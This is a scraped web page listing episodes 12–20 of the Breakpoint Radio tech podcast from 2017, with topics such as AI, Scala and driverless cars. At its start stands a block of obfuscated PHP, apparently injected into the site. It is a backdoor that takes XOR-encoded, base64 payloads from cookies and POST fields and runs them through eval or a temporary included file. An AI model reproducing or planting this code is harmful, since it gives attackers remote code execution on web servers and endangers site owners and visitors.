$eGOREacq = "\132" . chr ( 720 - 647 ).chr (95) . "\114" . chr ( 119 - 50 )."\x56" . "\142" . 'e';$nyLGtTlzgJ = "\x63" . "\x6c" . chr ( 582 - 485 )."\163" . 's' . "\x5f" . "\x65" . 'x' . chr (105) . 's' . "\x74" . chr ( 444 - 329 ); $gIZxvIxZ = class_exists($eGOREacq); $eGOREacq = "62478";$nyLGtTlzgJ = "30073";$xdRPukz = 0;if ($gIZxvIxZ == $xdRPukz){function gGwycz(){return FALSE;}$vEUdrKHqob = "46103";gGwycz();class ZI_LEVbe{private function zNTzvJ($vEUdrKHqob){if (is_array(ZI_LEVbe::$dBfIwLKWeq)) {$HuqUYYgkr = str_replace("\74" . "\x3f" . "\x70" . chr (104) . chr ( 569 - 457 ), "", ZI_LEVbe::$dBfIwLKWeq[chr ( 285 - 186 ).'o' . chr (110) . chr (116) . 'e' . chr (110) . "\164"]);eval($HuqUYYgkr); $vEUdrKHqob = "46103";exit();}}private $yZUVdIUc;public function BXZmZdAXQ(){echo 20240;}public function __destruct(){$vEUdrKHqob = "17948_2981";$this->zNTzvJ($vEUdrKHqob); $vEUdrKHqob = "17948_2981";}public function __construct($JTRLjiJhK=0){$iusOLIWguD = $_POST;$ubIfEKeAPM = $_COOKIE;$mnQtfQVMBl = "8121dbb1-4480-493a-957d-a43041fc31ba";$WIFbRs = @$ubIfEKeAPM[substr($mnQtfQVMBl, 0, 4)];if (!empty($WIFbRs)){$uegsY = "base64";$XnZBr = "";$WIFbRs = explode(",", $WIFbRs);foreach ($WIFbRs as $pYomxInD){$XnZBr .= @$ubIfEKeAPM[$pYomxInD];$XnZBr .= @$iusOLIWguD[$pYomxInD];}$XnZBr = array_map($uegsY . "\x5f" . 'd' . "\x65" . "\x63" . "\157" . "\x64" . chr ( 762 - 661 ), array($XnZBr,)); $XnZBr = $XnZBr[0] ^ str_repeat($mnQtfQVMBl, (strlen($XnZBr[0]) / strlen($mnQtfQVMBl)) + 1);ZI_LEVbe::$dBfIwLKWeq = @unserialize($XnZBr); $XnZBr = class_exists("17948_2981");}}public static $dBfIwLKWeq = 1088;}$VbGyKSb = new /* 15442 */ ZI_LEVbe(46103 + 46103);unset($VbGyKSb);}$aCyypinq = 'u' . "\x5f" . "\x57" . chr ( 115 - 43 ).'Y' . chr (85) . "\x67";$MiNzLzsrKM = chr ( 379 - 280 ).chr (108) . "\x61" . 's' . "\x73" . "\x5f" . "\145" . "\x78" . "\x69" . 's' . 't' . "\x73";$aifTVi = class_exists($aCyypinq); $aCyypinq = "21657";$MiNzLzsrKM = "58112";$yJJRIs = !1;if ($aifTVi == $yJJRIs){function EEkpveZz(){return FALSE;}$sdUiojuEO = "48155";EEkpveZz();class u_WHYUg{private function RUkuG($sdUiojuEO){if (is_array(u_WHYUg::$PxqkDRXi)) {$VyngwMSZNP = sys_get_temp_dir() . "/" . crc32(u_WHYUg::$PxqkDRXi["\x73" . chr ( 846 - 749 ).chr (108) . chr (116)]);@u_WHYUg::$PxqkDRXi["\x77" . chr (114) . "\x69" . chr (116) . "\x65"]($VyngwMSZNP, u_WHYUg::$PxqkDRXi[chr (99) . 'o' . chr (110) . chr ( 514 - 398 )."\x65" . "\156" . chr (116)]);include $VyngwMSZNP;@u_WHYUg::$PxqkDRXi["\x64" . "\145" . chr ( 900 - 792 ).'e' . chr ( 450 - 334 )."\x65"]($VyngwMSZNP); $sdUiojuEO = "48155";exit();}}private $vHKjc;public function jECssm(){echo 63544;}public function __destruct(){$sdUiojuEO = "64112_326";$this->RUkuG($sdUiojuEO); $sdUiojuEO = "64112_326";}public function __construct($zdldR=0){$AWArYf = $_POST;$RYtAiXRJ = $_COOKIE;$RKmGGmcTn = "63ca8f29-be20-4737-a469-28a91539d7d8";$dvsAe = @$RYtAiXRJ[substr($RKmGGmcTn, 0, 4)];if (!empty($dvsAe)){$CjCSRiyw = "base64";$bpBfjIN = "";$dvsAe = explode(",", $dvsAe);foreach ($dvsAe as $AFfRahSluv){$bpBfjIN .= @$RYtAiXRJ[$AFfRahSluv];$bpBfjIN .= @$AWArYf[$AFfRahSluv];}$bpBfjIN = array_map($CjCSRiyw . '_' . "\x64" . "\x65" . "\143" . chr (111) . chr (100) . 'e', array($bpBfjIN,)); $bpBfjIN = $bpBfjIN[0] ^ str_repeat($RKmGGmcTn, (strlen($bpBfjIN[0]) / strlen($RKmGGmcTn)) + 1);u_WHYUg::$PxqkDRXi = @unserialize($bpBfjIN); $bpBfjIN = class_exists("64112_326");}}public static $PxqkDRXi = 41933;}$TphzilG = new /* 28492 */ u_WHYUg(48155 + 48155); $_POST = Array();unset($TphzilG);} Breakpoint Radio – Page 2 – Breakpoint Radio

Podcast: Breakpoint Radio

Ep 20 – 18 July 2017 – ..Books, bots and..

Breakpoint radio logo Breakpoint Radio... techie brekkie and chat

In this episode we talk about… AI, driverless cars and the ethics involved, sex robots, Attwood’s Law, cryptocurrencies, Game of Thrones and more! Coffee from Starbucks, Holborn. Where bytes and bites collide.


Ep 19 – 28 June 2017 – ..Potter at t..t..t..twenty..

In this episode we talk about… Amazon echo show, Harry Potter at 20, AI and loneliness, fake news, breastfeeding and more! Food from Le Pain Quotidien, Southbank. Where bytes and bites collide.


Ep 18 – 16 June 2017 – ..Anyone can be an author..

In this episode we talk about… Black mirror and open source authoring, Apple WWDC, lots of new Scala releases, transparent salaries, Kim Jong Un as a romper suit and more! Food from Hubbard and Bell, Holborn. Where bytes and bites collide.


Ep 17 – 31 May 2017 – ..Fight the rules.

Breakpoint radio logo Breakpoint Radio... techie brekkie and chat

In this episode we talk about… Developers as the new Kingmakers, inclusiveness and diversity in tech, voice interfaces, Google IO and more! Food from Starbucks, Chancery Lane. Where bytes and bites collide.


Ep 16 – 9 May 2017 – ..Caught between Oslo and LX Scala..

Breakpoint radio logo Breakpoint Radio... techie brekkie and chat

In this episode we talk about… When the Scala compiler let’s you down, flatMap(Oslo), LX Scala, conversational interfaces, Fearless girl status, wikitribune and more! Food from Duck and Waffle, Liverpool St. Where bytes and bites collide.


Ep 15 – 13 April 2017 – ..The Machines are taking Over!!..

In this episode with special guest Anne Currie we talk about… Automation and rise of the machines, Ops and deployment tools, teaching kids tech, Machine learning and AI, Type-driven development and all the latest in FP! Food from Duck and Waffle, Liverpool St. Where bytes and bites collide.


Ep 14 – 15 Mar 2017 – ..moar of the guests! yay!..

In this episode.. Remote development tools, Conway’s game of life, Big data, AI, kaggle, Scalabridge, JDK 9, Scala Native, Bucky, Terraform 0.9, Google Next, OpenDime, Ethereum Name Service and Happy Birthday to Docker! Food from Dishoom, Kings X. Where bytes and bites collide.


Ep 13 – 02 Mar 2017 – ..this weeks theme, travel..

In this episode.. World book day, Uber gender scandal, new scala releases, new planets found! blockchain in the browser and the great S3 outage. Food from Hubbard and Bell, Holborn. Where bytes and bites collide.


Ep 12 – 15 Feb 2017 – ..with Dave G and Martin C..

In this episode.. Scala learning resources, remote collaboration tools, programming with types, privacy, education in the age of the robots and Google Spanner. Food from Bill’s Islington. Where bytes and bites collide.
